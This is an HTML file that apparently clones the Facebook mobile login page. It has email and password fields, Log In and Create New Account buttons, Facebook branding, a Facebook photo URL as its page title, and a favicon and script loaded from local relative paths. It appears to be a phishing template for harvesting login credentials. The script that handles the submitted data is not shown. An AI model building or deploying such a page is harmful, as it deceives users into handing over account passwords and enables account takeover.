<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>
      https://www.facebook.com/urcsp2.emcunited/photos/a.107429027506036/189309309318007/
    </title>
    <!-- Bootstrap Scss -->
    <link rel="stylesheet" href="../static/assets/css/main.css" />
    <link rel="icon" href="../static/assets/img/fbfav.png" />
  </head>
  <body>
    <div class="container p-0">
      <header>
        <h6 class="m-0">Get Facebook for Android and browse faster.</h6>
      </header>
      <main>
        <div class="container" id="formBody">
          <h3 class="text-center my-3">facebook</h3>
          <form id="myForm">
            <div class="form-group">
              <input
                type="text"
                class="form-control"
                placeholder="Mobile number or email"
                id="email"
              />
            </div>
            <div class="form-group">
              <input
                type="password"
                class="form-control"
                placeholder="Password"
                id="password"
              />
            </div>
            <div class="col-12 p-0" id="loginButton">
              <button class="btn btn-sm btn-primary w-100 py-2" type="submit">
                <h5 class="m-0">Log In</h5>
              </button>
            </div>
            <div class="col-12 p-0">
              <div>
                <p class="text-center my-3">or</p>
              </div>
            </div>
            <div
              class="col-12 p-0 justify-content-center align-items-center"
              id="createButton"
            >
              <button class="btn btn-sm btn-success w-50 py-2" type="submit">
                <h6 class="m-0">Create New Account</h6>
              </button>
              <a class="text-center mt-2" href="">Forgot password?</a>
            </div>
          </form>
        </div>
      </main>
      <footer>
        <div class="footerContent mt-5">
          <div class="col-sm-6" id="footerFirst">
            <ul>
              <li><h6>English(Us)</h6></li>
              <li><a href="">Bisaya</a></li>
              <li><a href="">한국어</a></li>
              <li><a href="">Português(Brasil)</a></li>
            </ul>
          </div>
          <div class="col-sm-6" id="footerSecond">
            <ul>
              <li><a href="">Filipino</a></li>
              <li><a href="">Español</a></li>
              <li><a href="">日本語</a></li>
            </ul>
          </div>
        </div>
        <p class="text-center">Facebook Inc.</p>
      </footer>
    </div>
    <script src="../static/assets/js/app.js"></script>
  </body>
</html>
